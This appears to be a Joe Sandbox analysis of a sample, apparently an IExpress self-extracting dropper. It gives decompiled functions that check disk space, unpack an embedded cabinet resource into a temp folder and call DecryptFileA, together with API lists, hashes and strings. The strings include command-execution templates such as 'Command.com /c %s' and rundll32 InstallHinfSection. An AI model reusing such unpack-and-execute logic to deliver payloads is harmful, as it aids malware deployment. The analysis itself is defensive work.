                                                  • Part of subcall function 003844B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 00384554
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                • API String ID: 383838535-472070384
                                                • Opcode ID: 980c67b9100bcc30bb566308cf699d1348178861ef55881f01a543178d9f10de
                                                • Instruction ID: 07f4105f2fef367a110442479b13cda84ece498530b0d4bf3060561a220deeaa
                                                • Opcode Fuzzy Hash: 980c67b9100bcc30bb566308cf699d1348178861ef55881f01a543178d9f10de
                                                • Instruction Fuzzy Hash: 10A137B1A003186BEB23BB24CC49BFA776D9B41310F1446D5E595A72C1EBB49E8BCB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 324 38597d-3859b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 3859bb-3859d8 call 3844b9 call 386285 324->325 326 3859dd-385a1b GetDiskFreeSpaceA 324->326 341 385c05-385c14 call 386ce0 325->341 327 385ba1-385bde memset call 386285 GetLastError FormatMessageA 326->327 328 385a21-385a4a MulDiv 326->328 338 385be3-385bfc call 3844b9 SetCurrentDirectoryA 327->338 328->327 332 385a50-385a6c GetVolumeInformationA 328->332 335 385a6e-385ab0 memset call 386285 GetLastError FormatMessageA 332->335 336 385ab5-385aca SetCurrentDirectoryA 332->336 335->338 340 385acc-385ad1 336->340 352 385c02 338->352 344 385ae2-385ae4 340->344 345 385ad3-385ad8 340->345 349 385ae6 344->349 350 385ae7-385af8 344->350 345->344 347 385ada-385ae0 345->347 347->340 347->344 349->350 351 385af9-385afb 350->351 354 385afd-385b03 351->354 355 385b05-385b08 351->355 356 385c04 352->356 354->351 354->355 357 385b0a-385b1b call 3844b9 355->357 358 385b20-385b27 355->358 356->341 357->352 360 385b29-385b33 358->360 361 385b52-385b5b 358->361 360->361 363 385b35-385b50 360->363 364 385b62-385b6d 361->364 363->364 365 385b6f-385b74 364->365 366 385b76-385b7d 364->366 367 385b85 365->367 368 385b7f-385b81 366->368 369 385b83 366->369 370 385b96-385b9f 367->370 371 385b87-385b94 call 38268b 367->371 368->367 369->367 370->356 371->356
                                                C-Code - Quality: 96%
                                                			E0038597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                				signed int _v8;
                                                				char _v16;
                                                				char _v276;
                                                				char _v788;
                                                				long _v792;
                                                				long _v796;
                                                				long _v800;
                                                				signed int _v804;
                                                				long _v808;
                                                				int _v812;
                                                				long _v816;
                                                				long _v820;
                                                				void* __ebx;
                                                				void* __esi;
                                                				signed int _t46;
                                                				int _t50;
                                                				signed int _t55;
                                                				void* _t66;
                                                				int _t69;
                                                				signed int _t73;
                                                				signed short _t78;
                                                				signed int _t87;
                                                				signed int _t101;
                                                				int _t102;
                                                				unsigned int _t103;
                                                				unsigned int _t105;
                                                				signed int _t111;
                                                				long _t112;
                                                				signed int _t116;
                                                				CHAR* _t118;
                                                				signed int _t119;
                                                				signed int _t120;
                                                
                                                				_t114 = __edi;
                                                				_t46 =  *0x388004; // 0xb25159a8
                                                				_v8 = _t46 ^ _t120;
                                                				_v804 = __edx;
                                                				_t118 = __ecx;
                                                				GetCurrentDirectoryA(0x104,  &_v276);
                                                				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                				if(_t50 != 0) {
                                                					_push(__edi);
                                                					_v796 = 0;
                                                					_v792 = 0;
                                                					_v800 = 0;
                                                					_v808 = 0;
                                                					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                					__eflags = _t55;
                                                					if(_t55 == 0) {
                                                						L29:
                                                						memset( &_v788, 0, 0x200);
                                                						 *0x389124 = E00386285();
                                                						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                						_t110 = 0x4b0;
                                                						L30:
                                                						__eflags = 0;
                                                						E003844B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                						SetCurrentDirectoryA( &_v276);
                                                						L31:
                                                						_t66 = 0;
                                                						__eflags = 0;
                                                						L32:
                                                						_pop(_t114);
                                                						goto L33;
                                                					}
                                                					_t69 = _v792 * _v796;
                                                					_v812 = _t69;
                                                					_t116 = MulDiv(_t69, _v800, 0x400);
                                                					__eflags = _t116;
                                                					if(_t116 == 0) {
                                                						goto L29;
                                                					}
                                                					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                					__eflags = _t73;
                                                					if(_t73 != 0) {
                                                						SetCurrentDirectoryA( &_v276); // executed
                                                						_t101 =  &_v16;
                                                						_t111 = 6;
                                                						_t119 = _t118 - _t101;
                                                						__eflags = _t119;
                                                						while(1) {
                                                							_t22 = _t111 - 4; // 0x2
                                                							__eflags = _t22;
                                                							if(_t22 == 0) {
                                                								break;
                                                							}
                                                							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                							__eflags = _t87;
                                                							if(_t87 == 0) {
                                                								break;
                                                							}
                                                							 *_t101 = _t87;
                                                							_t101 = _t101 + 1;
                                                							_t111 = _t111 - 1;
                                                							__eflags = _t111;
                                                							if(_t111 != 0) {
                                                								continue;
                                                							}
                                                							break;
                                                						}
                                                						__eflags = _t111;
                                                						if(_t111 == 0) {
                                                							_t101 = _t101 - 1;
                                                							__eflags = _t101;
                                                						}
                                                						 *_t101 = 0;
                                                						_t112 = 0x200;
                                                						_t102 = _v812;
                                                						_t78 = 0;
                                                						_t118 = 8;
                                                						while(1) {
                                                							__eflags = _t102 - _t112;
                                                							if(_t102 == _t112) {
                                                								break;
                                                							}
                                                							_t112 = _t112 + _t112;
                                                							_t78 = _t78 + 1;
                                                							__eflags = _t78 - _t118;
                                                							if(_t78 < _t118) {
                                                								continue;
                                                							}
                                                							break;
                                                						}
                                                						__eflags = _t78 - _t118;
                                                						if(_t78 != _t118) {
                                                							__eflags =  *0x389a34 & 0x00000008;
                                                							if(( *0x389a34 & 0x00000008) == 0) {
                                                								L20:
                                                								_t103 =  *0x389a38; // 0x0
                                                								_t110 =  *((intOrPtr*)(0x3889e0 + (_t78 & 0x0000ffff) * 4));
                                                								L21:
                                                								__eflags = (_v804 & 0x00000003) - 3;
                                                								if((_v804 & 0x00000003) != 3) {
                                                									__eflags = _v804 & 0x00000001;
                                                									if((_v804 & 0x00000001) == 0) {
                                                										__eflags = _t103 - _t116;
                                                									} else {
                                                										__eflags = _t110 - _t116;
                                                									}
                                                								} else {
                                                									__eflags = _t103 + _t110 - _t116;
                                                								}
                                                								if(__eflags <= 0) {
                                                									 *0x389124 = 0;
                                                									_t66 = 1;
                                                								} else {
                                                									_t66 = E0038268B(_a4, _t110, _t103,  &_v16);
                                                								}
                                                								goto L32;
                                                							}
                                                							__eflags = _v816 & 0x00008000;
                                                							if((_v816 & 0x00008000) == 0) {
                                                								goto L20;
                                                							}
                                                							_t105 =  *0x389a38; // 0x0
                                                							_t110 =  *((intOrPtr*)(0x3889e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x3889e0 + (_t78 & 0x0000ffff) * 4));
                                                							_t103 = (_t105 >> 2) +  *0x389a38;
                                                							goto L21;
                                                						}
                                                						_t110 = 0x4c5;
                                                						E003844B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                						goto L31;
                                                					}
                                                					memset( &_v788, 0, 0x200);
                                                					 *0x389124 = E00386285();
                                                					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                					_t110 = 0x4f9;
                                                					goto L30;
                                                				} else {
                                                					_t110 = 0x4bc;
                                                					E003844B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                					 *0x389124 = E00386285();
                                                					_t66 = 0;
                                                					L33:
                                                					return E00386CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                				}
                                                			}



































                                                0x0038597d
                                                0x00385988
                                                0x0038598f
                                                0x0038599a
                                                0x003859a6
                                                0x003859a8
                                                0x003859af
                                                0x003859b9
                                                0x003859dd
                                                0x003859e4
                                                0x003859f1
                                                0x003859fe
                                                0x00385a0b
                                                0x00385a13
                                                0x00385a19
                                                0x00385a1b
                                                0x00385ba1
                                                0x00385baf
                                                0x00385bbd
                                                0x00385bd8
                                                0x00385bde
                                                0x00385be3
                                                0x00385bec
                                                0x00385bf0
                                                0x00385bfc
                                                0x00385c02
                                                0x00385c02
                                                0x00385c02
                                                0x00385c04
                                                0x00385c04
                                                0x00000000
                                                0x00385c04
                                                0x00385a27
                                                0x00385a3a
                                                0x00385a46
                                                0x00385a48
                                                0x00385a4a
                                                0x00000000
                                                0x00000000
                                                0x00385a64
                                                0x00385a6a
                                                0x00385a6c
                                                0x00385abc
                                                0x00385ac2
                                                0x00385ac9
                                                0x00385aca
                                                0x00385aca
                                                0x00385acc
                                                0x00385acc
                                                0x00385acf
                                                0x00385ad1
                                                0x00000000
                                                0x00000000
                                                0x00385ad3
                                                0x00385ad6
                                                0x00385ad8
                                                0x00000000
                                                0x00000000
                                                0x00385ada
                                                0x00385adc
                                                0x00385add
                                                0x00385add
                                                0x00385ae0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00385ae0
                                                0x00385ae2
                                                0x00385ae4
                                                0x00385ae6
                                                0x00385ae6
                                                0x00385ae6
                                                0x00385ae9
                                                0x00385aeb
                                                0x00385af0
                                                0x00385af6
                                                0x00385af8
                                                0x00385af9
                                                0x00385af9
                                                0x00385afb
                                                0x00000000
                                                0x00000000
                                                0x00385afd
                                                0x00385aff
                                                0x00385b00
                                                0x00385b03
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00385b03
                                                0x00385b05
                                                0x00385b08
                                                0x00385b20
                                                0x00385b27
                                                0x00385b52
                                                0x00385b52
                                                0x00385b5b
                                                0x00385b62
                                                0x00385b6b
                                                0x00385b6d
                                                0x00385b76
                                                0x00385b7d
                                                0x00385b83
                                                0x00385b7f
                                                0x00385b7f
                                                0x00385b7f
                                                0x00385b6f
                                                0x00385b72
                                                0x00385b72
                                                0x00385b85
                                                0x00385b98
                                                0x00385b9e
                                                0x00385b87
                                                0x00385b8f
                                                0x00385b8f
                                                0x00000000
                                                0x00385b85
                                                0x00385b29
                                                0x00385b33
                                                0x00000000
                                                0x00000000
                                                0x00385b35
                                                0x00385b48
                                                0x00385b4a
                                                0x00000000
                                                0x00385b4a
                                                0x00385b0f
                                                0x00385b16
                                                0x00000000
                                                0x00385b16
                                                0x00385a7c
                                                0x00385a8a
                                                0x00385aa5
                                                0x00385aab
                                                0x00000000
                                                0x003859bb
                                                0x003859c0
                                                0x003859c7
                                                0x003859d1
                                                0x003859d6
                                                0x00385c05
                                                0x00385c14
                                                0x00385c14

                                                APIs
                                                • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 003859A8
                                                • SetCurrentDirectoryA.KERNELBASE(?), ref: 003859AF
                                                • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00385A13
                                                • MulDiv.KERNEL32(?,?,00000400), ref: 00385A40
                                                • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00385A64
                                                • memset.MSVCRT ref: 00385A7C
                                                • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00385A98
                                                • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00385AA5
                                                • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00385BFC
                                                  • Part of subcall function 003844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00384518
                                                  • Part of subcall function 003844B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 00384554
                                                  • Part of subcall function 00386285: GetLastError.KERNEL32(00385BBC), ref: 00386285
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                • String ID:
                                                • API String ID: 4237285672-0
                                                • Opcode ID: dd2ecae57fdd47a4c3f0bb74f195593277619704e7550dc573c255723b7d2518
                                                • Instruction ID: da516e295a7b623d2e955c6a12cd22a795a61a92cc9e067849df68e118fc21bf
                                                • Opcode Fuzzy Hash: dd2ecae57fdd47a4c3f0bb74f195593277619704e7550dc573c255723b7d2518
                                                • Instruction Fuzzy Hash: 97718FB190070CAFEB17EB64CC89BFA77ADEB48344F5440EAF50596140EA349E848B61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 374 384fe0-38501a call 38468f FindResourceA LoadResource LockResource 377 385020-385027 374->377 378 385161-385163 374->378 379 385029-385051 GetDlgItem ShowWindow GetDlgItem ShowWindow 377->379 380 385057-38505e call 384efd 377->380 379->380 383 38507c-3850b4 380->383 384 385060-385077 call 3844b9 380->384 389 3850e8-385104 call 3844b9 383->389 390 3850b6-3850da 383->390 388 385107-38510e 384->388 392 38511d-38511f 388->392 393 385110-385117 FreeResource 388->393 399 385106 389->399 398 3850dc 390->398 390->399 396 38513a-385141 392->396 397 385121-385127 392->397 393->392 401 38515f 396->401 402 385143-38514a 396->402 397->396 400 385129-385135 call 3844b9 397->400 405 3850e3-3850e6 398->405 399->388 400->396 401->378 402->401 403 38514c-385159 SendMessageA 402->403 403->401 405->389 405->399
                                                C-Code - Quality: 77%
                                                			E00384FE0(void* __edi, void* __eflags) {
                                                				void* __ebx;
                                                				void* _t8;
                                                				struct HWND__* _t9;
                                                				int _t10;
                                                				void* _t12;
                                                				struct HWND__* _t24;
                                                				struct HWND__* _t27;
                                                				intOrPtr _t29;
                                                				void* _t33;
                                                				int _t34;
                                                				CHAR* _t36;
                                                				int _t37;
                                                				intOrPtr _t47;
                                                
                                                				_t33 = __edi;
                                                				_t36 = "CABINET";
                                                				 *0x389144 = E0038468F(_t36, 0, 0);
                                                				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                				 *0x389140 = _t8;
                                                				if(_t8 == 0) {
                                                					return _t8;
                                                				}
                                                				_t9 =  *0x388584; // 0x0
                                                				if(_t9 != 0) {
                                                					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                					ShowWindow(GetDlgItem( *0x388584, 0x841), 5); // executed
                                                				}
                                                				_t10 = E00384EFD(0, 0); // executed
                                                				if(_t10 != 0) {
                                                					__imp__#20(E00384CA0, E00384CC0, E00384980, E00384A50, E00384AD0, E00384B60, E00384BC0, 1, 0x389148, _t33);
                                                					_t34 = _t10;
                                                					if(_t34 == 0) {
                                                						L8:
                                                						_t29 =  *0x389148; // 0x0
                                                						_t24 =  *0x388584; // 0x0
                                                						E003844B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                						_t37 = 0;
                                                						L9:
                                                						goto L10;
                                                					}
                                                					__imp__#22(_t34, "*MEMCAB", 0x381140, 0, E00384CD0, 0, 0x389140); // executed
                                                					_t37 = _t10;
                                                					if(_t37 == 0) {
                                                						goto L9;
                                                					}
                                                					__imp__#23(_t34); // executed
                                                					if(_t10 != 0) {
                                                						goto L9;
                                                					}
                                                					goto L8;
                                                				} else {
                                                					_t27 =  *0x388584; // 0x0
                                                					E003844B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                					_t37 = 0;
                                                					L10:
                                                					_t12 =  *0x389140; // 0x0
                                                					if(_t12 != 0) {
                                                						FreeResource(_t12);
                                                						 *0x389140 = 0;
                                                					}
                                                					if(_t37 == 0) {
                                                						_t47 =  *0x3891d8; // 0x0
                                                						if(_t47 == 0) {
                                                							E003844B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                						}
                                                					}
                                                					if(( *0x388a38 & 0x00000001) == 0 && ( *0x389a34 & 0x00000001) == 0) {
                                                						SendMessageA( *0x388584, 0xfa1, _t37, 0);
                                                					}
                                                					return _t37;
                                                				}
                                                			}
















                                                0x00384fe0
                                                0x00384fe6
                                                0x00384ff9
                                                0x0038500d
                                                0x00385013
                                                0x0038501a
                                                0x00385163
                                                0x00385163
                                                0x00385020
                                                0x00385027
                                                0x00385037
                                                0x00385051
                                                0x00385051
                                                0x00385057
                                                0x0038505e
                                                0x003850a7
                                                0x003850ad
                                                0x003850b4
                                                0x003850e8
                                                0x003850e8
                                                0x003850ee
                                                0x003850ff
                                                0x00385104
                                                0x00385106
                                                0x00000000
                                                0x00385106
                                                0x003850cd
                                                0x003850d3
                                                0x003850da
                                                0x00000000
                                                0x00000000
                                                0x003850dd
                                                0x003850e6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00385060
                                                0x00385060
                                                0x00385070
                                                0x00385075
                                                0x00385107
                                                0x00385107
                                                0x0038510e
                                                0x00385111
                                                0x00385117
                                                0x00385117
                                                0x0038511f
                                                0x00385121
                                                0x00385127
                                                0x00385135
                                                0x00385135
                                                0x00385127
                                                0x00385141
                                                0x00385159
                                                0x00385159
                                                0x00000000
                                                0x0038515f

                                                APIs
                                                  • Part of subcall function 0038468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003846A0
                                                  • Part of subcall function 0038468F: SizeofResource.KERNEL32(00000000,00000000,?,00382D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003846A9
                                                  • Part of subcall function 0038468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003846C3
                                                  • Part of subcall function 0038468F: LoadResource.KERNEL32(00000000,00000000,?,00382D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003846CC
                                                  • Part of subcall function 0038468F: LockResource.KERNEL32(00000000,?,00382D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003846D3
                                                  • Part of subcall function 0038468F: memcpy_s.MSVCRT ref: 003846E5
                                                  • Part of subcall function 0038468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003846EF
                                                • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00384FFE
                                                • LoadResource.KERNEL32(00000000,00000000), ref: 00385006
                                                • LockResource.KERNEL32(00000000), ref: 0038500D
                                                • GetDlgItem.USER32(00000000,00000842), ref: 00385030
                                                • ShowWindow.USER32(00000000), ref: 00385037
                                                • GetDlgItem.USER32(00000841,00000005), ref: 0038504A
                                                • ShowWindow.USER32(00000000), ref: 00385051
                                                • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00385111
                                                • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00385159
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                • String ID: *MEMCAB$CABINET
                                                • API String ID: 1305606123-2642027498
                                                • Opcode ID: 5f34c4ef2cdf96c1106472fcc496c1e1b3194f90dd1deebd2efd87313313c781
                                                • Instruction ID: fa707e6d9488e68064173937e69fbbdc4f03c9d337a37f7364207e9eba6eb87f
                                                • Opcode Fuzzy Hash: 5f34c4ef2cdf96c1106472fcc496c1e1b3194f90dd1deebd2efd87313313c781
                                                • Instruction Fuzzy Hash: DB3109B0780702BBEB237B61AC8DFB7369DA744B55F0504D6F902A6691DAB88C008760
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 450 382f1d-382f3d 451 382f6c-382f73 call 385164 450->451 452 382f3f-382f46 450->452 461 382f79-382f80 call 3855a0 451->461 462 383041 451->462 454 382f48 call 3851e5 452->454 455 382f5f-382f66 call 383a3f 452->455 459 382f4d-382f4f 454->459 455->451 455->462 459->462 464 382f55-382f5d 459->464 461->462 469 382f86-382fbe GetSystemDirectoryA call 38658a LoadLibraryA 461->469 463 383043-383053 call 386ce0 462->463 464->451 464->455 472 382fc0-382fd4 GetProcAddress 469->472 473 382ff7-383004 FreeLibrary 469->473 472->473 474 382fd6-382fee DecryptFileA 472->474 475 383006-38300c 473->475 476 383017-383024 SetCurrentDirectoryA 473->476 474->473 485 382ff0-382ff5 474->485 475->476 477 38300e call 38621e 475->477 478 383054-38305a 476->478 479 383026-38303c call 3844b9 call 386285 476->479 489 383013-383015 477->489 481 38305c call 383b26 478->481 482 383065-38306c 478->482 479->462 491 383061-383063 481->491 487 38307c-383089 482->487 488 38306e-383075 call 38256d 482->488 485->473 493 38308b-383091 487->493 494 3830a1-3830a9 487->494 498 38307a 488->498 489->462 489->476 491->462 491->482 493->494 499 383093 call 383ba2 493->499 496 3830ab-3830ad 494->496 497 3830b4-3830b7 494->497 496->497 501 3830af call 384169 496->501 497->463 498->487 504 383098-38309a 499->504 501->497 504->462 505 38309c 504->505 505->494
                                                C-Code - Quality: 82%
                                                			E00382F1D(void* __ecx, int __edx) {
                                                				signed int _v8;
                                                				char _v272;
                                                				_Unknown_base(*)()* _v276;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t9;
                                                				void* _t11;
                                                				struct HWND__* _t12;
                                                				void* _t14;
                                                				int _t21;
                                                				signed int _t22;
                                                				signed int _t25;
                                                				intOrPtr* _t26;
                                                				signed int _t27;
                                                				void* _t30;
                                                				_Unknown_base(*)()* _t31;
                                                				void* _t34;
                                                				struct HINSTANCE__* _t36;
                                                				intOrPtr _t41;
                                                				intOrPtr* _t44;
                                                				signed int _t46;
                                                				int _t47;
                                                				void* _t58;
                                                				void* _t59;
                                                
                                                				_t43 = __edx;
                                                				_t9 =  *0x388004; // 0xb25159a8
                                                				_v8 = _t9 ^ _t46;
                                                				if( *0x388a38 != 0) {
                                                					L5:
                                                					_t11 = E00385164(_t52);
                                                					_t53 = _t11;
                                                					if(_t11 == 0) {
                                                						L16:
                                                						_t12 = 0;
                                                						L17:
                                                						return E00386CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                					}
                                                					_t14 = E003855A0(_t53); // executed
                                                					if(_t14 == 0) {
                                                						goto L16;
                                                					} else {
                                                						_t45 = 0x105;
                                                						GetSystemDirectoryA( &_v272, 0x105);
                                                						_t43 = 0x105;
                                                						_t40 =  &_v272;
                                                						E0038658A( &_v272, 0x105, "advapi32.dll");
                                                						_t36 = LoadLibraryA( &_v272);
                                                						_t44 = 0;
                                                						if(_t36 != 0) {
                                                							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                							_v276 = _t31;
                                                							if(_t31 != 0) {
                                                								_t45 = _t47;
                                                								_t40 = _t31;
                                                								 *0x38a288("C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\", 0); // executed
                                                								_v276();
                                                								if(_t47 != _t47) {
                                                									_t40 = 4;
                                                									asm("int 0x29");
                                                								}
                                                							}
                                                						}
                                                						FreeLibrary(_t36);
                                                						_t58 =  *0x388a24 - _t44; // 0x0
                                                						if(_t58 != 0) {
                                                							L14:
                                                							_t21 = SetCurrentDirectoryA("C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\"); // executed
                                                							if(_t21 != 0) {
                                                								__eflags =  *0x388a2c - _t44; // 0x0
                                                								if(__eflags != 0) {
                                                									L20:
                                                									__eflags =  *0x388d48 & 0x000000c0;
                                                									if(( *0x388d48 & 0x000000c0) == 0) {
                                                										_t41 =  *0x389a40; // 0x3, executed
                                                										_t26 = E0038256D(_t41); // executed
                                                										_t44 = _t26;
                                                									}
                                                									_t22 =  *0x388a24; // 0x0
                                                									 *0x389a44 = _t44;
                                                									__eflags = _t22;
                                                									if(_t22 != 0) {
                                                										L26:
                                                										__eflags =  *0x388a38;
                                                										if( *0x388a38 == 0) {
                                                											__eflags = _t22;
                                                											if(__eflags == 0) {
                                                												E00384169(__eflags);
                                                											}
                                                										}
                                                										_t12 = 1;
                                                										goto L17;
                                                									} else {
                                                										__eflags =  *0x389a30 - _t22; // 0x0
                                                										if(__eflags != 0) {
                                                											goto L26;
                                                										}
                                                										_t25 = E00383BA2(); // executed
                                                										__eflags = _t25;
                                                										if(_t25 == 0) {
                                                											goto L16;
                                                										}
                                                										_t22 =  *0x388a24; // 0x0
                                                										goto L26;
                                                									}
                                                								}
                                                								_t27 = E00383B26(_t40, _t44);
                                                								__eflags = _t27;
                                                								if(_t27 == 0) {
                                                									goto L16;
                                                								}
                                                								goto L20;
                                                							}
                                                							_t43 = 0x4bc;
                                                							E003844B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                							 *0x389124 = E00386285();
                                                							goto L16;
                                                						}
                                                						_t59 =  *0x389a30 - _t44; // 0x0
                                                						if(_t59 != 0) {
                                                							goto L14;
                                                						}
                                                						_t30 = E0038621E(); // executed
                                                						if(_t30 == 0) {
                                                							goto L16;
                                                						}
                                                						goto L14;
                                                					}
                                                				}
                                                				_t49 =  *0x388a24;
                                                				if( *0x388a24 != 0) {
                                                					L4:
                                                					_t34 = E00383A3F(_t51);
                                                					_t52 = _t34;
                                                					if(_t34 == 0) {
                                                						goto L16;
                                                					}
                                                					goto L5;
                                                				}
                                                				if(E003851E5(_t49) == 0) {
                                                					goto L16;
                                                				}
                                                				_t51 =  *0x388a38;
                                                				if( *0x388a38 != 0) {
                                                					goto L5;
                                                				}
                                                				goto L4;
                                                			}




























                                                0x00382f1d
                                                0x00382f28
                                                0x00382f2f
                                                0x00382f3d
                                                0x00382f6c
                                                0x00382f6c
                                                0x00382f71
                                                0x00382f73
                                                0x00383041
                                                0x00383041
                                                0x00383043
                                                0x00383053
                                                0x00383053
                                                0x00382f79
                                                0x00382f80
                                                0x00000000
                                                0x00382f86
                                                0x00382f86
                                                0x00382f93
                                                0x00382f9e
                                                0x00382fa0
                                                0x00382fa6
                                                0x00382fb8
                                                0x00382fba
                                                0x00382fbe
                                                0x00382fc6
                                                0x00382fcc
                                                0x00382fd4
                                                0x00382fd6
                                                0x00382fd8
                                                0x00382fe0
                                                0x00382fe6
                                                0x00382fee
                                                0x00382ff0
                                                0x00382ff5
                                                0x00382ff5
                                                0x00382fee
                                                0x00382fd4
                                                0x00382ff8
                                                0x00382ffe
                                                0x00383004
                                                0x00383017
                                                0x0038301c
                                                0x00383024
                                                0x00383054
                                                0x0038305a
                                                0x00383065
                                                0x00383065
                                                0x0038306c
                                                0x0038306e
                                                0x00383075
                                                0x0038307a
                                                0x0038307a
                                                0x0038307c
                                                0x00383081
                                                0x00383087
                                                0x00383089
                                                0x003830a1
                                                0x003830a1
                                                0x003830a9
                                                0x003830ab
                                                0x003830ad
                                                0x003830af
                                                0x003830af
                                                0x003830ad
                                                0x003830b6
                                                0x00000000
                                                0x0038308b
                                                0x0038308b
                                                0x00383091
                                                0x00000000
                                                0x00000000
                                                0x00383093
                                                0x00383098
                                                0x0038309a
                                                0x00000000
                                                0x00000000
                                                0x0038309c
                                                0x00000000
                                                0x0038309c
                                                0x00383089
                                                0x0038305c
                                                0x00383061
                                                0x00383063
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00383063
                                                0x0038302b
                                                0x00383032
                                                0x0038303c
                                                0x00000000
                                                0x0038303c
                                                0x00383006
                                                0x0038300c
                                                0x00000000
                                                0x00000000
                                                0x0038300e
                                                0x00383015
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00383015
                                                0x00382f80
                                                0x00382f3f
                                                0x00382f46
                                                0x00382f5f
                                                0x00382f5f
                                                0x00382f64
                                                0x00382f66
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00382f66
                                                0x00382f4f
                                                0x00000000
                                                0x00000000
                                                0x00382f55
                                                0x00382f5d
